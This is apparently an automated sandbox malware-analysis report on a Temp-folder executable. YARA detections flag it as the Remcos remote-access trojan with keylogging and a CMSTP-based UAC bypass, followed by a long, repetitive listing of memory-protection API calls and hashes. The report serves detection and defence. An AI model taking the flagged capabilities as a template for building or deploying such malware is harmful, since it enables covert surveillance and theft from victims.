                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:12:02:12
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4'054'528 bytes
                                                                                                                                                    MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:12:02:35
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\ccrdlld.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4'054'528 bytes
                                                                                                                                                    MD5 hash:27650AFE28BA588C759ADE95BF403833
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:false

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0.7%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:4.4%
                                                                                                                                                      Total number of Nodes:341
                                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$HJED$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1824788938
                                                                                                                                                      • Opcode ID: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                                                                                                      • Instruction ID: 92b41a86a38d0950ceaafc42da025f647756d5826f6a67780238649d31adf876
                                                                                                                                                      • Opcode Fuzzy Hash: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                                                                                                      • Instruction Fuzzy Hash: 111258A2D042549BF7208B24DC45BEB7B78EF91310F1481FAD84D66281D67D1FC68BAB

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 2YQ$4>85$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1705831375
                                                                                                                                                      • Opcode ID: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                                                                                                      • Instruction ID: b4819d296ad88a352d89a36c323faf44c94428e0c63bd935716a99660375177f
                                                                                                                                                      • Opcode Fuzzy Hash: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                                                                                                      • Instruction Fuzzy Hash: 01D145A2D082949BF7218624DC857EB7B79DF91310F1481FED44D66281D27E0FC68B67

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                                                                                                      • Instruction ID: 31348504180dde6f2db56645b78a9417e8ac1ec904f0fb92e4b74cabad837206
                                                                                                                                                      • Opcode Fuzzy Hash: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                                                                                                      • Instruction Fuzzy Hash: CE1269E2D082549BF7208624DC85BEB7B79EB91310F1481FAD84D66281D27D4FC6CBA7

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                                                                                                      • Instruction ID: c211d26a15be80cd6d6061afdc2ec0d619a11bf4a02e20cf0df1070803d10200
                                                                                                                                                      • Opcode Fuzzy Hash: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                                                                                                      • Instruction Fuzzy Hash: F40249A2C082549BF7218624DC857EB7B78EF91310F1481FAD84D66281D27D5FC6CBA7

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                                                                                                      • Instruction ID: c4181e04a6996f4a4ec10402a5543215efd0a88869ad37b10ba3953f19293162
                                                                                                                                                      • Opcode Fuzzy Hash: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                                                                                                      • Instruction Fuzzy Hash: 7C023AA2C082549BF7218624DC857EB7B78DB91310F1441FAD84D66282D27D5FC6CBA7

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                                                                                                      • Instruction ID: c903f80ca669c1afc00443ee636d1640197b0a82a322bb41a1c8637baa7919a8
                                                                                                                                                      • Opcode Fuzzy Hash: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                                                                                                      • Instruction Fuzzy Hash: A5F168A1C082949BF7208724DC45BEB7B78EF91310F1481FAD84D66281D27D5FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                                                                                                      • Instruction ID: b8acdf7308d6b49c1c337050b9d19dbe257c8f1b3eae7aa5982e5ef740dbfe66
                                                                                                                                                      • Opcode Fuzzy Hash: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                                                                                                      • Instruction Fuzzy Hash: 07F167A1C082949BF7208724DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                                                                                                      • Instruction ID: faa1a34d37298e59c9a25781ba2a3a4b68259adcb83db6b2e4dbd1f49f2a147f
                                                                                                                                                      • Opcode Fuzzy Hash: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                                                                                                      • Instruction Fuzzy Hash: 14E166A1C082949BF7208724DC85BEB7B79EF81310F1481FAD84D66281D27D4FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                                                                                                      • Instruction ID: 20942be26a0bb1574d21cdffcfd82772a50fcfd8e16b7139ac4f6ebf2c59fc95
                                                                                                                                                      • Opcode Fuzzy Hash: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                                                                                                      • Instruction Fuzzy Hash: D7E158A1D082949BF7218724DC857EB7B78EF91310F1481FAD84D66281D27D4FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                                                                                                      • Instruction ID: 01bf1487118900520c2c4ee157e84824dabc5311628179446bcc3d50be1815b7
                                                                                                                                                      • Opcode Fuzzy Hash: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                                                                                                      • Instruction Fuzzy Hash: DDE168A1C082949BF7218624DC85BEB7B78EF81310F1481FAD84D66281D27D5FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                                                                                                      • Instruction ID: 849cf98f0d9e8883edd505fd289fa4cf39ab600865f398a2a22228110a8db3d5
                                                                                                                                                      • Opcode Fuzzy Hash: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                                                                                                      • Instruction Fuzzy Hash: 36E157A1C082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                                                                                                      • Instruction ID: 5db5ed6562b64ea0462ee99b5b7c6444358f02f3e63aec1b00d977781b5c55bf
                                                                                                                                                      • Opcode Fuzzy Hash: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                                                                                                      • Instruction Fuzzy Hash: 82E167A1D082949BF7218724DC85BEB7B78EF91310F1481FAD84D66281D27D0FC68B6B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                                                                                                      • Instruction ID: 7a26878e1429824609114e8566e6b795f961bb7ace041d1e6cb9dac7be62f7eb
                                                                                                                                                      • Opcode Fuzzy Hash: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                                                                                                      • Instruction Fuzzy Hash: B9E166A1C082949BF7218724DC85BEB7B79EF91310F1481FAD44D66281D27E1FC68BA7

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                                                                                                      • Instruction ID: 70a33bfecfa557418bc060e572197bcbb6dc652cbf25d6133d418ddf569241ff
                                                                                                                                                      • Opcode Fuzzy Hash: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                                                                                                      • Instruction Fuzzy Hash: 2CE155A1D082949BF7218724DC85BEB7B79EF81310F1481FAD44D66281D27E1FC68B67

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                                                                                                      • Instruction ID: d4274db13835bcdff87d680cf6ecabf6aba49fd63204c7bd4018fda4a7829106
                                                                                                                                                      • Opcode Fuzzy Hash: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                                                                                                      • Instruction Fuzzy Hash: D0E155A1D082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27E0FC6CB67
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                                                                                                      • Instruction ID: 35a6c91b93bcc543530c330e6d87c59423f88a8d6f3860633bbcfde72b804a63
                                                                                                                                                      • Opcode Fuzzy Hash: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                                                                                                      • Instruction Fuzzy Hash: 8BD135A1D082989BF7218624DC857EB7B79EF81310F1481FAD44D66281D27E1FC6CB67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                                                                                                      • Instruction ID: e31c6f0428a1ad879084d030e7b3d80e503b2bf2136415014f88d123122c71be
                                                                                                                                                      • Opcode Fuzzy Hash: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                                                                                                      • Instruction Fuzzy Hash: 072247A2D041649BF7208A24DC84BEB7B79EF81310F1481FAD94D67681D67D1FC2CBA6
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                                                                                                      • Instruction ID: d3bba2d6cd0b6a7d7d00e7274d5b21a2e9ebe1fb828867428a6b522fd52b3a50
                                                                                                                                                      • Opcode Fuzzy Hash: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                                                                                                      • Instruction Fuzzy Hash: CBE148A2D082989BF7208624DC84BEB7B79DB91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                                                                                                      • Instruction ID: 55feaba93ad7e77a48e0621d9403177f2a566d95734184cbc5de5217829b400d
                                                                                                                                                      • Opcode Fuzzy Hash: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                                                                                                      • Instruction Fuzzy Hash: EFE126A2D082A49BF7218624DC847EB7B79EF91310F1481FAD54D67281D27D0FC6CBA6
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                                                                                                      • Instruction ID: 913d053d6a4b87e8076cff9152b857ea02e6a9364de0a608fca4d402f9b139d6
                                                                                                                                                      • Opcode Fuzzy Hash: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                                                                                                      • Instruction Fuzzy Hash: 47E137A2D082A49BF7218624DC44BEB7B79DF91310F1481FAD54D66281D27E0FC6CBA7
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
